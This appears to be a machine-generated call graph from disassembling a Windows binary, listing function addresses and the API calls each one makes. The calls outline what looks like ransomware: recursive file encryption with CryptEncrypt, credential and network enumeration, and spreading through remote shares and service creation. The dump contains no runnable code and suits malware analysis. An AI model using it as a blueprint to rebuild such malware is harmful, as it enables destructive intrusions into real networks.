5661 4bf26dc GetProcessHeap HeapFree 5659->5661 5662 4bf2590 htons 5659->5662 5660->5659 5660->5660 5661->5657 5663 4bf25cd rand 5662->5663 5663->5663 5664 4bf25dd GetProcessHeap HeapAlloc 5663->5664 5665 4bf25fe memcpy memcpy send 5664->5665 5666 4bf26cc GetProcessHeap HeapFree 5664->5666 5667 4bf26ba GetProcessHeap HeapFree 5665->5667 5668 4bf263a send 5665->5668 5666->5661 5667->5666 5668->5667 5670 4bf2653 5668->5670 5669 4bf2694 recv 5669->5670 5671 4bf269d 5669->5671 5670->5667 5670->5669 5670->5671 5671->5667 5673 4bf2e48 GetProcessHeap HeapAlloc 5672->5673 5674 4bf2f51 5672->5674 5675 4bf2f3e GetProcessHeap HeapFree 5673->5675 5676 4bf2e5c htons 5673->5676 5674->5475 5675->5674 5679 4bf2ed3 5676->5679 5677 4bf2ee7 send 5678 4bf2efd recv 5677->5678 5677->5679 5678->5679 5679->5677 5680 4bf2f2e GetProcessHeap HeapFree 5679->5680 5681 4bf2f2a 5679->5681 5680->5675 5681->5680 5683 4bf2e08 5682->5683 5684 4bf29d5 GetProcessHeap HeapAlloc 5682->5684 5683->5479 5685 4bf29eb rand htons 5684->5685 5686 4bf2df6 GetProcessHeap HeapFree 5684->5686 5687 4bf2a7e rand 5685->5687 5686->5683 5687->5687 5688 4bf2a8d 5687->5688 5689 4bf2a91 rand send 5688->5689 5691 4bf2ae5 rand htons GetProcessHeap HeapAlloc 5688->5691 5689->5688 5690 4bf2ac5 recv 5689->5690 5690->5688 5690->5691 5692 4bf2de6 GetProcessHeap HeapFree 5691->5692 5693 4bf2b82 htons 5691->5693 5692->5686 5694 4bf2bbe rand 5693->5694 5694->5694 5695 4bf2bce GetProcessHeap HeapAlloc 5694->5695 5696 4bf2bec htons GetProcessHeap HeapAlloc 5695->5696 5697 4bf2dd6 GetProcessHeap HeapFree 5695->5697 5698 4bf2dc3 GetProcessHeap HeapFree 5696->5698 5699 4bf2c72 memcpy memcpy htons 5696->5699 5697->5692 5698->5697 5700 4bf2d0c memcpy 5699->5700 5700->5700 5701 4bf2d25 send 5700->5701 5702 4bf2dae GetProcessHeap HeapFree 5701->5702 5703 4bf2d3d send 5701->5703 5702->5698 5703->5702 5705 4bf2d55 5703->5705 5704 4bf2d83 recv 5704->5705 5706 4bf2d8c 5704->5706 5705->5702 5705->5704 5705->5706 5706->5702 5708 4bf31a2 rand 5707->5708 5709 4bf3201 5707->5709 5710 4bf31bd rand 5708->5710 5709->5470 5709->5482 5710->5710 5711 4bf31ca 5710->5711 5812 4bf2f5a GetProcessHeap HeapAlloc 5711->5812 5716 4bf32a7 5715->5716 5717 4bf3233 htons memcpy send 5715->5717 5716->5496 5718 4bf3297 GetProcessHeap HeapFree 5717->5718 5719 4bf3293 5717->5719 5718->5716 5719->5718 5721 4bf339b GetProcessHeap HeapFree 5720->5721 5722 4bf32e1 GetProcessHeap HeapAlloc 5720->5722 5721->5494 5721->5496 5723 4bf32fe htons memcpy send 5722->5723 5724 4bf3388 GetProcessHeap HeapFree 5722->5724 5725 4bf335a recv 5723->5725 5726 4bf3378 GetProcessHeap HeapFree 5723->5726 5724->5721 5725->5726 5727 4bf3372 5725->5727 5726->5724 5727->5726 5729 4bf33ce htons memcpy send 5728->5729 5730 4bf3441 5728->5730 5731 4bf342d 5729->5731 5732 4bf3431 GetProcessHeap HeapFree 5729->5732 5730->5496 5731->5732 5732->5730 5734 4bf36ad GetProcessHeap HeapAlloc 5733->5734 5735 4bf3d03 5733->5735 5736 4bf3cf7 GetProcessHeap HeapFree 5734->5736 5737 4bf36c0 GetProcessHeap HeapAlloc 5734->5737 5735->5499 5784 4bf41e9 GetProcessHeap HeapAlloc 5735->5784 5736->5735 5738 4bf36dc 5737->5738 5739 4bf3ce1 GetProcessHeap HeapFree 5737->5739 5740 4bf3b39 5738->5740 5741 4bf36e8 5738->5741 5739->5736 5745 4bf3209 7 API calls 5740->5745 5742 4bf33a4 7 API calls 5741->5742 5743 4bf3745 5742->5743 5744 4bf3cd1 GetProcessHeap HeapFree 5743->5744 5746 4bf3787 5743->5746 5748 4bf33a4 7 API calls 5743->5748 5744->5739 5747 4bf3baa 5745->5747 5746->5744 5750 4bf379d Sleep 5746->5750 5747->5744 5749 4bf3bb2 Sleep 5747->5749 5748->5746 5751 4bf3bca 5749->5751 5752 4bf3209 7 API calls 5750->5752 5754 4bf3209 7 API calls 5751->5754 5753 4bf3806 5752->5753 5753->5744 5756 4bf3876 5753->5756 5759 4bf3209 7 API calls 5753->5759 5755 4bf3c5b 5754->5755 5755->5744 5758 4bf3c5f Sleep rand 5755->5758 5756->5744 5757 4bf3888 Sleep 5756->5757 5761 4bf33a4 7 API calls 5757->5761 5762 4bf3209 7 API calls 5758->5762 5760 4bf3841 5759->5760 5760->5756 5766 4bf33a4 7 API calls 5760->5766 5763 4bf38d2 5761->5763 5764 4bf3cbe 5762->5764 5763->5744 5767 4bf33a4 7 API calls 5763->5767 5764->5744 5765 4bf3cc2 Sleep 5764->5765 5765->5744 5766->5756 5768 4bf392c 5767->5768 5768->5744 5769 4bf3934 GetProcessHeap HeapAlloc 5768->5769 5769->5744 5770 4bf3953 memset 5769->5770 5771 4bf3209 7 API calls 5770->5771 5772 4bf3978 5771->5772 5773 4bf3b22 GetProcessHeap HeapFree 5772->5773 5774 4bf3980 recv 5772->5774 5773->5744 5774->5773 5775 4bf399b 5774->5775 5775->5773 5776 4bf39a8 htons 5775->5776 5776->5773 5777 4bf39c1 5776->5777 5777->5773 5778 4bf3209 7 API calls 5777->5778 5779 4bf3a88 5778->5779 5779->5773 5780 4bf3a90 Sleep rand 5779->5780 5781 4bf33a4 7 API calls 5780->5781 5782 4bf3b0f 5781->5782 5782->5773 5783 4bf3b13 Sleep 5782->5783 5783->5773 5785 4bf4679 5784->5785 5786 4bf4217 5784->5786 5785->5499 5820 4bf40e3 GetProcessHeap HeapAlloc 5786->5820 5789 4bf4669 GetProcessHeap HeapFree 5789->5785 5792 4bf4271 GetProcessHeap HeapFree 5793 4bf4683 5792->5793 5794 4bf42a0 5792->5794 5796 4bf40e3 17 API calls 5793->5796 5795 4bf42e8 5794->5795 5797 4bf3d0d 45 API calls 5794->5797 5795->5789 5798 4bf3d0d 45 API calls 5795->5798 5811 4bf465e 5796->5811 5799 4bf42c7 5797->5799 5801 4bf431d 5798->5801 5799->5795 5800 4bf42cb GetProcessHeap HeapFree 5799->5800 5800->5795 5801->5789 5802 4bf4325 GetProcessHeap HeapFree 5801->5802 5803 4bf4351 5802->5803 5804 4bf3d0d 45 API calls 5803->5804 5805 4bf436e 5804->5805 5805->5789 5806 4bf4376 GetProcessHeap HeapFree memset 5805->5806 5806->5789 5807 4bf43c1 5806->5807 5808 4bf40e3 17 API calls 5807->5808 5809 4bf4641 5808->5809 5810 4bf40e3 17 API calls 5809->5810 5809->5811 5810->5811 5811->5789 5813 4bf2f89 GetProcessHeap HeapAlloc 5812->5813 5814 4bf3068 GetProcessHeap HeapFree 5812->5814 5815 4bf2fa6 htons memcpy send 5813->5815 5816 4bf3055 GetProcessHeap HeapFree 5813->5816 5814->5709 5817 4bf3045 GetProcessHeap HeapFree 5815->5817 5818 4bf3025 recv 5815->5818 5816->5814 5817->5816 5818->5817 5819 4bf303c 5818->5819 5819->5817 5821 4bf41e0 5820->5821 5822 4bf410b GetProcessHeap HeapAlloc 5820->5822 5821->5789 5833 4bf3d0d GetProcessHeap HeapAlloc 5821->5833 5824 4bf4158 5822->5824 5825 4bf41d4 GetProcessHeap HeapFree 5822->5825 5826 4bf3209 7 API calls 5824->5826 5825->5821 5827 4bf417b 5826->5827 5828 4bf417f Sleep 5827->5828 5829 4bf41c6 GetProcessHeap HeapFree 5827->5829 5830 4bf3209 7 API calls 5828->5830 5829->5825 5831 4bf41b3 5830->5831 5831->5829 5832 4bf41b7 Sleep 5831->5832 5832->5829 5834 4bf40da 5833->5834 5835 4bf3d41 GetProcessHeap HeapAlloc 5833->5835 5834->5789 5834->5792 5836 4bf40cb GetProcessHeap HeapFree 5835->5836 5837 4bf3d55 GetProcessHeap HeapAlloc 5835->5837 5836->5834 5838 4bf40bf GetProcessHeap HeapFree 5837->5838 5839 4bf3d72 5837->5839 5838->5836 5840 4bf3209 7 API calls 5839->5840 5841 4bf3e4e 5840->5841 5842 4bf3e56 Sleep GetProcessHeap HeapAlloc 5841->5842 5843 4bf40b3 GetProcessHeap HeapFree 5841->5843 5842->5843 5844 4bf3e79 rand 5842->5844 5843->5838 5845 4bf32af 12 API calls 5844->5845 5846 4bf3ef0 5845->5846 5847 4bf409b GetProcessHeap HeapFree 5846->5847 5848 4bf3ef8 memset 5846->5848 5847->5843 5849 4bf3209 7 API calls 5848->5849 5850 4bf3f22 5849->5850 5850->5847 5851 4bf3f2a recv 5850->5851 5851->5847 5852 4bf3f46 5851->5852 5852->5847 5853 4bf3f50 htons 5852->5853 5853->5847 5854 4bf3f73 5853->5854 5855 4bf3209 7 API calls 5854->5855 5856 4bf3feb 5855->5856 5856->5847 5857 4bf3ff3 Sleep 5856->5857 5858 4bf3209 7 API calls 5857->5858 5859 4bf405a 5858->5859 5859->5847 5860 4bf405e Sleep GetProcessHeap HeapAlloc 5859->5860 5860->5847 5861 4bf4084 memcpy 5860->5861 5861->5847 5863 4bf4f38 5862->5863 5864 4bf4e89 5862->5864 5863->5557 5863->5562 5865 4bf2f5a 12 API calls 5864->5865 5866 4bf4ee8 5865->5866 5867 4bf4f2f GetProcessHeap HeapFree 5866->5867 5903 4bf3071 GetProcessHeap HeapAlloc 5866->5903 5867->5863 5870 4bf4f27 GetProcessHeap HeapFree 5870->5867 5872 4bf5014 5871->5872 5873 4bf4f6f 5871->5873 5872->5566 5872->5567 5873->5873 5874 4bf4f86 rand 5873->5874 5875 4bf2f5a 12 API calls 5874->5875 5876 4bf4fad 5875->5876 5877 4bf5004 GetProcessHeap HeapFree 5876->5877 5878 4bf3071 14 API calls 5876->5878 5877->5872 5880 4bf4fcb 5878->5880 5879 4bf4ff4 GetProcessHeap HeapFree 5879->5877 5880->5877 5880->5879 5882 4bf4b77 GetProcessHeap HeapAlloc 5881->5882 5884 4bf4c2e rand 5882->5884 5886 4bf4cff 5882->5886 5884->5886 5886->5574 5887 4bf501e 5886->5887 5888 4bf2f5a 12 API calls 5887->5888 5890 4bf5040 5888->5890 5889 4bf509b 5889->5574 5894 4bf50a2 GetProcessHeap HeapAlloc 5889->5894 5890->5889 5891 4bf3071 14 API calls 5890->5891 5893 4bf5060 5891->5893 5892 4bf508b GetProcessHeap HeapFree 5892->5889 5893->5889 5893->5892 5895 4bf50ca 5894->5895 5896 4bf5162 5894->5896 5897 4bf2f5a 12 API calls 5895->5897 5896->5574 5898 4bf5117 5897->5898 5899 4bf5155 GetProcessHeap HeapFree 5898->5899 5900 4bf3071 14 API calls 5898->5900 5899->5896 5901 4bf513f 5900->5901 5901->5899 5902 4bf5143 GetProcessHeap HeapFree 5901->5902 5902->5899 5904 4bf309f GetProcessHeap HeapAlloc 5903->5904 5905 4bf3173 5903->5905 5906 4bf30b3 htons send 5904->5906 5907 4bf3160 GetProcessHeap HeapFree 5904->5907 5905->5867 5905->5870 5908 4bf3101 recv 5906->5908 5909 4bf3150 GetProcessHeap HeapFree 5906->5909 5907->5905 5908->5909 5910 4bf311c 5908->5910 5909->5907 5910->5909 5911 4bf3124 GetProcessHeap HeapAlloc 5910->5911 5911->5909 5912 4bf313f memcpy 5911->5912 5912->5909 5914 4bf6b90 5913->5914 5915 4bf6e29 EnterCriticalSection 5913->5915 5914->5346 5916 4bf6e39 5915->5916 5920 4bf6da4 5916->5920 5921 4bf6e13 LeaveCriticalSection 5920->5921 5922 4bf6db3 EnterCriticalSection 5920->5922 5921->5914 5923 4bf6e0b LeaveCriticalSection 5922->5923 5924 4bf6dc6 5922->5924 5923->5921 5925 4bf6df1 5924->5925 5927 4bf6aa8 5924->5927 5925->5923 5928 4bf6aca 5927->5928 5929 4bf6ab1 5927->5929 5928->5924 5929->5928 5930 4bf6ab7 StrCmpIW 5929->5930 5930->5928 5932 4bf634f LocalFree 5931->5932 5933 4bf62b9 5931->5933 5952 4bf5507 CryptAcquireContextW 5933->5952 5937 4bf6345 CloseHandle 5937->5932 5939 4bf633c CryptReleaseContext 5939->5937 5943 4bf6333 CryptDestroyKey 5943->5939 5946 4bf62ed CreateThread 5976 4bf5e9f 5946->5976 6053 4bf60f9 5946->6053 5947 4bf632a CryptDestroyKey 5947->5943 5950 4bf631f CryptDestroyHash 5950->5947 5951 4bf630f WaitForSingleObject CloseHandle 5951->5950 5953 4bf5528 GetLastError 5952->5953 5954 4bf5542 5952->5954 5953->5954 5955 4bf5535 CryptAcquireContextW 5953->5955 5954->5937 5956 4bf5613 CryptStringToBinaryW 5954->5956 5955->5954 5957 4bf56ce 5956->5957 5958 4bf5640 LocalAlloc 5956->5958 5957->5939 5966 4bf6085 CryptCreateHash 5957->5966 5958->5957 5959 4bf5655 CryptStringToBinaryW 5958->5959 5960 4bf5668 CryptDecodeObjectEx 5959->5960 5961 4bf56c5 LocalFree 5959->5961 5960->5961 5962 4bf5688 LocalAlloc 5960->5962 5961->5957 5962->5961 5963 4bf5695 CryptDecodeObjectEx 5962->5963 5964 4bf56be LocalFree 5963->5964 5965 4bf56ac CryptImportPublicKeyInfo 5963->5965 5964->5961 5965->5964 5967 4bf60f1 5966->5967 5968 4bf60b0 CryptHashData 5966->5968 5967->5943 5972 4bf6246 CryptCreateHash 5967->5972 5968->5967 5969 4bf60c4 CryptDeriveKey CryptDestroyHash 5968->5969 5969->5967 5970 4bf60ea 5969->5970 5990 4bf559b CryptSetKeyParam CryptSetKeyParam CryptGetKeyParam 5970->5990 5973 4bf626a CryptHashData 5972->5973 5974 4bf6292 5972->5974 5973->5974 5975 4bf627d CryptGetHashParam 5973->5975 5974->5946 5974->5947 5975->5974 5977 4bf607d 5976->5977 5978 4bf5eb8 PathCombineW 5976->5978 5977->5950 5977->5951 5978->5977 5979 4bf5ed6 FindFirstFileW 5978->5979 5979->5977 5980 4bf5ef6 WaitForMultipleObjects 5979->5980 5981 4bf6073 FindClose 5980->5981 5985 4bf5f17 5980->5985 5981->5977 5982 4bf605c FindNextFileW 5982->5980 5982->5981 5983 4bf5fa1 PathCombineW 5983->5982 5983->5985 5984 4bf6016 PathFindExtensionW 5984->5985 5985->5981 5985->5982 5985->5983 5985->5984 5986 4bf5fdf StrStrIW 5985->5986 5987 4bf5e9f 36 API calls 5985->5987 5995 4bf5d0a CryptDuplicateKey 5985->5995 6018 4bf59b1 5985->6018 5986->5982 5986->5985 5987->5985 5991 4bf560c 5990->5991 5992 4bf55e4 5990->5992 5991->5967 5992->5991 5993 4bf55e9 LocalAlloc 5992->5993 5993->5991 5994 4bf55fb CryptSetKeyParam LocalFree 5993->5994 5994->5991 5996 4bf5e98 5995->5996 5997 4bf5d38 CreateFileW 5995->5997 5996->5982 5998 4bf5e7c CryptDestroyKey 5997->5998 5999 4bf5d58 GetFileSizeEx 5997->5999 5998->5996 6000 4bf5e8a 5998->6000 6001 4bf5da2 CreateFileMappingW 5999->6001 6007 4bf5d78 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 5999->6007 6000->5996 6004 4bf5e8f SetEvent 6000->6004 6002 4bf5e6e FindCloseChangeNotification 6001->6002 6003 4bf5dcd 6001->6003 6002->5998 6022 4bf5a73 GetSystemInfo 6003->6022 6004->5996 6007->6001 6008 4bf5e4c 6010 4bf5e51 FindCloseChangeNotification 6008->6010 6009 4bf5df3 MapViewOfFile 6009->6008 6011 4bf5e0a CryptEncrypt 6009->6011 6010->6002 6012 4bf5e5e 6010->6012 6013 4bf5e26 FlushViewOfFile 6011->6013 6014 4bf5e32 UnmapViewOfFile 6011->6014 6048 4bf5a11 GetFileSizeEx 6012->6048 6013->6014 6014->6010 6016 4bf5e3f 6014->6016 6036 4bf5bc4 GetSystemInfo 6016->6036 6019 4bf59c5 6018->6019 6019->6019 6020 4bf59eb StrStrIW 6019->6020 6021 4bf5a09 6020->6021 6021->5985 6023 4bf5ac8 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 6022->6023 6024 4bf5adb MapViewOfFile 6023->6024 6025 4bf5afb 6024->6025 6026 4bf5bba 6024->6026 6027 4bf5baa 6025->6027 6028 4bf5b26 CryptDuplicateHash 6025->6028 6026->6008 6026->6009 6029 4bf5bb1 UnmapViewOfFile 6027->6029 6028->6029 6030 4bf5b3c CryptHashData 6028->6030 6029->6026 6031 4bf5b9f CryptDestroyHash 6030->6031 6032 4bf5b53 LocalAlloc 6030->6032 6031->6029 6032->6031 6033 4bf5b6b CryptGetHashParam 6032->6033 6034 4bf5b98 LocalFree 6033->6034 6035 4bf5b84 6033->6035 6034->6031 6035->6034 6037 4bf5c19 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 6036->6037 6038 4bf5c2c MapViewOfFile 6037->6038 6039 4bf5c4e CryptDuplicateHash 6038->6039 6040 4bf5d00 6038->6040 6041 4bf5c6b CryptHashData 6039->6041 6042 4bf5cf7 UnmapViewOfFile 6039->6042 6040->6008 6043 4bf5c7f LocalAlloc 6041->6043 6044 4bf5cee CryptDestroyHash 6041->6044 6042->6040 6043->6044 6045 4bf5c98 CryptGetHashParam 6043->6045 6044->6042 6046 4bf5cae memcpy FlushViewOfFile 6045->6046 6047 4bf5ce5 LocalFree 6045->6047 6046->6047 6047->6044 6049 4bf5a6b 6048->6049 6050 4bf5a33 6048->6050 6049->6002 6050->6049 6051 4bf5a45 SetFilePointerEx 6050->6051 6051->6049 6052 4bf5a60 SetEndOfFile 6051->6052 6052->6049 6054 4bfa760 6053->6054 6055 4bf6106 wsprintfW PathCombineW 6054->6055 6056 4bf6144 6055->6056 6059 4bf623d 6055->6059 6072 4bf6477 GetTickCount 6056->6072 6058 4bf614a 6058->6059 6060 4bf615a WaitForMultipleObjects 6058->6060 6060->6059 6061 4bf617e CreateFileW 6060->6061 6062 4bf623c 6061->6062 6063 4bf61a2 6061->6063 6062->6059 6073 4bf57e5 6063->6073 6066 4bf61bb memset StrCatW StrCatW 6068 4bf61fc 6066->6068 6067 4bf6235 CloseHandle 6067->6062 6068->6068 6069 4bf6207 WriteFile 6068->6069 6070 4bf622c LocalFree 6069->6070 6071 4bf6225 FlushFileBuffers 6069->6071 6070->6067 6071->6070 6072->6058 6074 4bf57fd LocalAlloc 6073->6074 6075 4bf59a8 6073->6075 6074->6075 6076 4bf5818 GetSystemDefaultLCID GetTimeZoneInformation 6074->6076 6075->6066 6075->6067 6077 4bf5838 6076->6077 6078 4bf5841 memcpy NetWkstaGetInfo 6076->6078 6077->6078 6079 4bf58fe 6078->6079 6085 4bf586f 6078->6085 6094 4bf56d8 6079->6094 6082 4bf5918 LocalAlloc 6083 4bf5992 LocalFree 6082->6083 6088 4bf5930 memcpy 6082->6088 6083->6075 6084 4bf58cf 6087 4bf58f2 NetApiBufferFree 6084->6087 6090 4bf58de memcpy 6084->6090 6085->6084 6086 4bf58bc memcpy 6085->6086 6086->6084 6087->6079 6091 4bf595a 6088->6091 6090->6087 6091->6091 6102 4bf5780 CryptBinaryToStringW 6091->6102 6095 4bf56ef 6094->6095 6098 4bf5776 6094->6098 6096 4bf56f7 CryptEncrypt 6095->6096 6095->6098 6097 4bf571a LocalAlloc 6096->6097 6096->6098 6097->6098 6099 4bf5731 memcpy CryptEncrypt 6097->6099 6098->6082 6098->6083 6099->6098 6100 4bf5759 LocalFree 6099->6100 6100->6098 6103 4bf57ce LocalFree 6102->6103 6104 4bf57a4 LocalAlloc 6102->6104 6103->6083 6104->6103 6105 4bf57b9 CryptBinaryToStringW 6104->6105 6105->6103 6106 4bf57d5 LocalFree 6105->6106 6106->6103 6108 4bf80fa 6107->6108 6108->6108 6109 4bf8106 wsprintfW 6108->6109 6110 4bf7fb7 6 API calls 6109->6110 6111 4bf8142 6110->6111 6111->5080 6111->5081 6113 4bf8183 CreateToolhelp32Snapshot 6112->6113 6113->5090 6113->5091 6115 4bfa05f 6114->6115 6116 4bfa046 DuplicateTokenEx 6114->6116 6117 4bf6c5f 13 API calls 6115->6117 6116->6115 6118 4bfa07a 6117->6118 6137 4bf75d8 WNetOpenEnumW 6118->6137 6123 4bf6cc8 3 API calls 6124 4bfa08e 6123->6124 6125 4bf6b0e 7 API calls 6124->6125 6134 4bfa09a 6125->6134 6126 4bfa0e5 6128 4bfa0fb 6126->6128 6129 4bfa0f1 CloseHandle 6126->6129 6130 4bfa107 6128->6130 6131 4bfa101 CloseHandle 6128->6131 6129->6128 6131->6130 6132 4bf6b5f StrCmpIW EnterCriticalSection LeaveCriticalSection EnterCriticalSection LeaveCriticalSection 6132->6134 6133 4bf6ad0 3 API calls 6133->6134 6134->6126 6134->6132 6134->6133 6135 4bfa0df 6134->6135 6154 4bf9534 6134->6154 6191 4bf6b46 GetProcessHeap HeapFree 6135->6191 6138 4bf760b GlobalAlloc 6137->6138 6139 4bf76e8 6137->6139 6138->6139 6140 4bf7624 6138->6140 6146 4bf76f2 CredEnumerateW 6139->6146 6141 4bf7627 memset WNetEnumResourceW 6140->6141 6144 4bf75d8 14 API calls 6140->6144 6145 4bf6b95 14 API calls 6140->6145 6141->6140 6142 4bf76ce GlobalFree WNetCloseEnum 6141->6142 6142->6139 6144->6140 6145->6140 6147 4bf77c9 6146->6147 6151 4bf771c 6146->6151 6147->6123 6148 4bf77c0 CredFree 6148->6147 6149 4bf77be 6149->6148 6150 4bf6b95 14 API calls 6150->6151 6151->6148 6151->6149 6151->6150 6152 4bf777e 6151->6152 6152->6151 6153 4bf69ae 24 API calls 6152->6153 6153->6152 6155 4bf9544 6154->6155 6156 4bf985f SetLastError 6155->6156 6157 4bf9560 wsprintfW 6155->6157 6156->6134 6192 4bf88d3 6157->6192 6159 4bf95b2 wsprintfW wsprintfW PathFindExtensionW 6161 4bf960b wsprintfW 6159->6161 6162 4bf9606 6159->6162 6163 4bf962a WNetAddConnection2W PathFileExistsW 6161->6163 6162->6161 6164 4bf96c8 6163->6164 6165 4bf9653 GetLastError 6163->6165 6164->6156 6167 4bf984b WNetCancelConnection2W 6164->6167 6166 4bf87e7 3 API calls 6165->6166 6173 4bf966e 6166->6173 6167->6156 6168 4bf96d5 6170 4bf96f4 6168->6170 6171 4bf96df 6168->6171 6169 4bf9674 GetLastError 6169->6164 6169->6173 6208 4bf944f 6170->6208 6195 4bf68b5 6171->6195 6173->6156 6173->6164 6173->6168 6173->6169 6179 4bf96ad WNetCancelConnection2W 6173->6179 6177 4bf982a GetLastError 6180 4bf9830 6177->6180 6178 4bf9726 memset GetSystemTimeAsFileTime wsprintfW CreateServiceW 6181 4bf9809 GetLastError 6178->6181 6182 4bf9791 StartServiceW 6178->6182 6179->6163 6180->6164 6185 4bf9836 DeleteFileW 6180->6185 6183 4bf981e CloseServiceHandle 6181->6183 6184 4bf9816 6181->6184 6186 4bf97a6 GetLastError 6182->6186 6187 4bf97b3 6182->6187 6183->6180 6184->6183 6185->6164 6186->6187 6188 4bf97cc QueryServiceStatus 6187->6188 6189 4bf97f3 DeleteService CloseServiceHandle 6187->6189 6190 4bf97e6 Sleep 6187->6190 6188->6187 6188->6189 6189->6183 6190->6188 6190->6189 6191->6126 6193 4bf88de PathFindFileNameW 6192->6193 6194 4bf88ed 6192->6194 6193->6194 6194->6159 6194->6194 6196 4bf68cd 6195->6196 6196->6196 6197 4bf68d8 GetProcessHeap HeapAlloc 6196->6197 6198 4bf69a5 6197->6198 6199 4bf6901 memcpy 6197->6199 6198->6170 6201 4bf692f 6199->6201 6201->6201 6202 4bf693a GetProcessHeap HeapAlloc 6201->6202 6203 4bf699a GetProcessHeap HeapFree 6202->6203 6204 4bf6958 memcpy 6202->6204 6203->6198 6206 4bf6e1b 5 API calls 6204->6206 6207 4bf698e GetProcessHeap HeapFree 6206->6207 6207->6203 6209 4bf945c 6208->6209 6210 4bf88d3 PathFindFileNameW 6209->6210 6211 4bf9489 6210->6211 6212 4bf6cc8 3 API calls 6211->6212 6215 4bf94f2 OpenSCManagerW 6211->6215 6213 4bf94e1 6212->6213 6214 4bf6735 18 API calls 6213->6214 6214->6215 6215->6177 6215->6178 6219 4bf892a GetCurrentThread OpenThreadToken 6216->6219 6220 4bf8959 GetTokenInformation 6219->6220 6221 4bf8a17 GetLastError 6219->6221 6222 4bf8a0c CloseHandle 6220->6222 6223 4bf8977 GetLastError 6220->6223 6224 4bf795f 6221->6224 6222->6224 6225 4bf8a0a 6223->6225 6226 4bf8989 GlobalAlloc 6223->6226 6225->6222 6227 4bf899b GetTokenInformation 6226->6227 6228 4bf8a08 GetLastError 6226->6228 6229 4bf89fd GetLastError 6227->6229 6232 4bf89ae 6227->6232 6228->6225 6230 4bf89ff GlobalFree 6229->6230 6230->6225 6231 4bf89bd GetSidSubAuthorityCount 6231->6232 6232->6230 6232->6231 6233 4bf89fb 6232->6233 6234 4bf89ce GetSidSubAuthority 6232->6234 6233->6230 6234->6232 6236 4bf8a95 6235->6236 6237 4bf8a8b Sleep GetSystemMetrics 6236->6237 6238 4bf8a99 SetEvent 6236->6238 6237->6236 6239 4bf8aad 6238->6239 6240 4bf8aa6 Sleep 6238->6240 6241 4bf8a23 14 API calls 6239->6241 6240->6239 6247 4bf8ab2 6241->6247 6242 4bf8b1e LocalFree 6243 4bf8ad3 htonl 6284 4bfa567 6243->6284 6245 4bf8ae0 htonl inet_ntoa 6289 4bf641a MultiByteToWideChar 6245->6289 6247->6242 6247->6243 6247->6245 6248 4bf6b95 14 API calls 6247->6248 6249 4bf8b00 GetProcessHeap HeapFree 6248->6249 6249->6247 6251 4bfa1c9 6250->6251 6252 4bfa1d0 GetProcessHeap HeapAlloc 6250->6252 6253 4bfa016 114 API calls 6251->6253 6254 4bfa32a 6252->6254 6255 4bfa200 GetProcessHeap HeapAlloc 6252->6255 6253->6252 6255->6254 6256 4bfa219 6255->6256 6257 4bf6b0e 7 API calls 6256->6257 6262 4bfa222 6257->6262 6258 4bfa24e CreateThread 6259 4bfa322 6258->6259 6258->6262 6301 4bfa112 6258->6301 6300 4bf6b46 GetProcessHeap HeapFree 6259->6300 6261 4bfa286 GetModuleHandleA GetProcAddress 6261->6262 6262->6254 6262->6258 6262->6259 6262->6261 6263 4bfa2ea GetProcessHeap HeapAlloc 6262->6263 6264 4bfa2d8 CloseHandle 6262->6264 6266 4bf6ad0 3 API calls 6262->6266 6263->6259 6265 4bfa2f9 GetProcessHeap HeapAlloc 6263->6265 6264->6263 6265->6259 6265->6262 6266->6262 6268 4bf6b95 14 API calls 6267->6268 6269 4bf77f1 6268->6269 6270 4bf6b95 14 API calls 6269->6270 6271 4bf77fc 6270->6271 6272 4bf6b95 14 API calls 6271->6272 6273 4bf7807 GetComputerNameExW 6272->6273 6274 4bf7825 6273->6274 6275 4bf7831 CreateThread 6273->6275 6276 4bf6b95 14 API calls 6274->6276 6277 4bf784e 6275->6277 6278 4bf7847 FindCloseChangeNotification 6275->6278 6427 4bf8b2e 6275->6427 6276->6275 6281 4bf786f Sleep 6277->6281 6400 4bf733c LoadLibraryW 6277->6400 6410 4bf742c GetIpNetTable 6277->6410 6420 4bf751b NetServerEnum 6277->6420 6278->6277 6281->6277 6293 4bfa476 memset socket 6284->6293 6287 4bfa58b 6287->6247 6288 4bfa476 8 API calls 6288->6287 6290 4bf646e 6289->6290 6291 4bf6442 GetProcessHeap HeapAlloc 6289->6291 6290->6247 6291->6290 6292 4bf645a MultiByteToWideChar 6291->6292 6292->6290 6294 4bfa55d 6293->6294 6295 4bfa4d3 htons ioctlsocket 6293->6295 6294->6287 6294->6288 6296 4bfa556 closesocket 6295->6296 6297 4bfa502 connect select 6295->6297 6296->6294 6297->6296 6298 4bfa541 __WSAFDIsSet 6297->6298 6298->6296 6299 4bfa553 6298->6299 6299->6296 6300->6254 6302 4bfa19e 6301->6302 6303 4bfa125 6301->6303 6304 4bfa14d 6303->6304 6314 4bf9f7a 6303->6314 6306 4bfa155 6304->6306 6307 4bfa160 6304->6307 6312 4bfa171 6304->6312 6323 4bf98ab 6306->6323 6308 4bfa182 GetProcessHeap HeapFree GetProcessHeap HeapFree 6307->6308 6311 4bf9534 67 API calls 6307->6311 6308->6302 6311->6312 6312->6308 6313 4bf6b5f 5 API calls 6312->6313 6313->6308 6315 4bf686c 7 API calls 6314->6315 6318 4bf9f98 6315->6318 6316 4bfa00c 6316->6304 6317 4bf9534 67 API calls 6317->6318 6318->6316 6318->6317 6320 4bfa006 6318->6320 6322 4bf6893 3 API calls 6318->6322 6336 4bf9b63 6318->6336 6386 4bf6b46 GetProcessHeap HeapFree 6320->6386 6322->6318 6324 4bf6ced 7 API calls 6323->6324 6325 4bf98c8 6324->6325 6326 4bf9969 6325->6326 6327 4bf98d7 CreateThread 6325->6327 6331 4bf9961 6325->6331 6334 4bf6d35 3 API calls 6325->6334 6326->6307 6326->6312 6327->6325 6328 4bf990a SetThreadToken 6327->6328 6397 4bf988b 6327->6397 6329 4bf993a CloseHandle 6328->6329 6330 4bf9919 ResumeThread 6328->6330 6329->6325 6332 4bf9927 WaitForSingleObject 6330->6332 6333 4bf9934 GetLastError 6330->6333 6396 4bf6b46 GetProcessHeap HeapFree 6331->6396 6332->6329 6333->6329 6334->6325 6337 4bf9b70 6336->6337 6338 4bf9b87 wsprintfW 6337->6338 6339 4bf9f01 SetLastError 6337->6339 6340 4bf88d3 PathFindFileNameW 6338->6340 6339->6318 6341 4bf9bdb wsprintfW wsprintfW PathFindExtensionW 6340->6341 6343 4bf9c2c 6341->6343 6344 4bf9c31 wsprintfW 6341->6344 6343->6344 6345 4bf9c4a 